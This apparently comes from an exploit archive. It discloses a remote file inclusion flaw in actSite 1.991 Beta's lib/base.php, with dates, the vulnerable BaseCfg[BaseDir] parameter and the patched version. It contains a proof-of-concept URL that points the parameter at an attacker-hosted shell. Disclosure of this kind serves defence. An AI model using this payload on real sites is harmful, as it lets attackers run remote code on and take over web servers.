actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability
# Published : 2007-10-01
# Author : DNX
# Previous Title : actSite 1.56 (news.php) Local File Inclusion Vulnerability
# Next Title : PHP-Fusion module Expanded Calendar 2.x SQL Injection Exploit

#'#/

                             (-.-)

   ---------------------oOO---(_)---OOo--------------------

   | actSite v1.991 Beta (base.php) Remote File Inclusion |

   |                     coded by DNX                     |

   --------------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: $BaseCfg[BaseDir] in lib/base.php



[!] PoC: 

    - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]



[!] Solution: Install update to v1.995

# www.Syue.com [2007-10-01]